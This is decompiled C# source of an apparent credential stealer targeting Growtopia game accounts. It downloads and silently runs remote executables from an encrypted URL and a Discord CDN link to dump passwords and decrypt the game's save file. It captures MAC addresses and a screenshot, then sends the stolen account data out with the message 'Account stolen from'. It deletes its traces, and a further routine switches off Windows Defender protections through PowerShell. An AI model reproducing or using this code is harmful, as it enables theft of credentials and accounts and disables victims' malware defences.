// Token: 0x06000009 RID: 9 RVA: 0x00002C74 File Offset: 0x00000E74
private static string DINGDONGGETTROLL()
{
string text = Environment.ExpandEnvironmentVariables("%TEMP%");
WebClient webClient = new WebClient();
webClient.DownloadFile(Executable.SUCKDICKXD("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe");
webClient.Dispose();
new Process
{
StartInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
FileName = text + "\\resourcefilehaha.exe",
Arguments = "/C /stext " + text + "\\credentialslmao.txt"
}
}.Start();
Thread.Sleep(5000);
File.Delete(text + "\\resourcefilehaha.exe");
string result = File.ReadAllText(text + "\\credentialslmao.txt");
File.Delete(text + "\\credentialslmao.txt");
return(result);
}
// Token: 0x06000004 RID: 4 RVA: 0x0000215C File Offset: 0x0000035C
private static void Main()
{
WebClient webClient = new WebClient();
try
{
foreach (Process process in Process.GetProcessesByName("savedecoder.exe"))
{
process.Kill();
}
string key = "kljsdooqlo4454GG";
"C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
try
{
StreamWriter streamWriter = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt");
foreach (NetworkInterface networkInterface in from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up && nic.NetworkInterfaceType != NetworkInterfaceType.Loopback
select nic)
{
string str = string.Join("", networkInterface.GetPhysicalAddress().GetAddressBytes().Select((byte b) => b.ToString("X2")));
streamWriter.Write(str + "\n");
}
streamWriter.Close();
}
catch
{
}
try
{
Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
using (Graphics graphics = Graphics.FromImage(bitmap))
{
graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
bitmap.Save(string.Concat(new string[]
{
"C:\\Users\\",
Environment.UserName,
"\\AppData\\Local\\Temp\\",
Environment.UserName,
"screenshot.png"
}));
}
}
catch
{
}
bool attachments = true;
string path = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt";
string text = Executable.DINGDONGDANG();
string text2 = File.ReadAllText(path);
string str2 = Environment.ExpandEnvironmentVariables("%TEMP%");
"C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
string.Concat(new string[]
{
"C:\\Users\\",
Environment.UserName,
"\\AppData\\Local\\Temp\\",
Environment.UserName,
" pictures.zip"
});
string path2 = string.Concat(new string[]
{
"C:\\Users\\",
Environment.UserName,
"\\AppData\\Local\\Temp\\",
Environment.UserName,
"screenshot.png"
});
string contents = Executable.DINGDONGGETTROLL();
File.WriteAllText(str2 + "\\" + Environment.UserName + " credentials.txt", contents);
str2 + "\\" + Environment.UserName + " credentials.txt";
IFOUGHTINWW1 ifoughtinww = new IFOUGHTINWW1();
ifoughtinww.HANGURSELF = Executable.XXX(key, "GrWz5DcWMtfQ7dy+2aTGgQ==");
try
{
webClient.DownloadFile("https://cdn.discordapp.com/attachments/775300885990998059/775459023562473512/savedecrypter.exe", Path.GetTempPath() + "//savedecoder.exe");
Process.Start(new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
FileName = Path.GetTempPath() + "//savedecoder.exe"
});
Thread.Sleep(2500);
if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
{
File.ReadAllText(Path.GetTempPath() + "//pwd.txt");
string[] array = File.ReadAllText(Path.GetTempPath() + "\\pwd.txt").Split(new char[]
{
'='
});
string text3 = array[0];
string plainText = array[1];
string plainText2 = array[2];
using (StreamWriter streamWriter2 = new StreamWriter(Path.GetTempPath() + "\\" + text3 + ".cbuilder"))
{
streamWriter2.Write(string.Concat(new string[]
{
Executable.EncryptString(key, text3),
"|",
Executable.EncryptString(key, plainText),
"|",
Executable.EncryptString(key, plainText2),
"|"
}));
}
ifoughtinww.XDLSD(Path.GetTempPath() + "\\" + text3 + ".cbuilder", text3 + ".cbuilder");
File.Delete(Path.GetTempPath() + "//pwd.txt");
File.Delete(Path.GetTempPath() + "//savedecoder.exe");
ifoughtinww.XDLOLLMAO(string.Concat(new string[]
{
"[C-Builder] Account stolen from:: ",
Environment.UserName,
" / ",
Environment.MachineName,
"\nGrowID :: ",
text3,
"\nIP address:: ",
text,
"\nMac addresses:: \n",
text2
}), attachments);
}
if (File.Exists(str2 + "\\" + Environment.UserName + " credentials.txt"))
{
File.Delete(str2 + "\\" + Environment.UserName + " credentials.txt");
}
if (File.Exists(path))
{
File.Delete(path);
}
if (File.Exists(path2))
{
File.Delete(path2);
}
try
{
foreach (Process process2 in Process.GetProcessesByName("savedecoder.exe"))
{
process2.Kill();
File.Delete(Path.GetTempPath() + "\\pass_decoder.exe");
}
}
catch
{
}
}
catch
{
}
foreach (Process process3 in Process.GetProcessesByName("savedecoder.exe"))
{
process3.Kill();
}
if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
{
File.Delete(Path.GetTempPath() + "//pwd.txt");
}
if (File.Exists(Path.GetTempPath() + "//savedecoder.exe"))
{
File.Delete(Path.GetTempPath() + "//savedecoder.exe");
}
}
catch
{
}
}
// Token: 0x06000006 RID: 6 RVA: 0x00002894 File Offset: 0x00000A94
private static void WHYTFUSKID()
{
Process process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = "Get-MpPreference -verbose",
UseShellExecute = false,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
process.Start();
while (!process.StandardOutput.EndOfStream)
{
string text = process.StandardOutput.ReadLine();
if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableRealtimeMonitoring $true");
}
else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableBehaviorMonitoring $true");
}
else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableBlockAtFirstSeen $true");
}
else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableIOAVProtection $true");
}
else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisablePrivacyMode $true");
}
else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
}
else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableArchiveScanning $true");
}
else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableIntrusionPreventionSystem $true");
}
else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False"))
{
Executable.IDIOT("Set-MpPreference -DisableScriptScanning $true");
}
else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2"))
{
Executable.IDIOT("Set-MpPreference -SubmitSamplesConsent 2");
}
else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0"))
{
Executable.IDIOT("Set-MpPreference -MAPSReporting 0");
}
else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6"))
{
Executable.IDIOT("Set-MpPreference -HighThreatDefaultAction 6 -Force");
}
else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6"))
{
Executable.IDIOT("Set-MpPreference -ModerateThreatDefaultAction 6");
}
else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6"))
{
Executable.IDIOT("Set-MpPreference -LowThreatDefaultAction 6");
}
else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6"))
{
Executable.IDIOT("Set-MpPreference -SevereThreatDefaultAction 6");
}
}
}
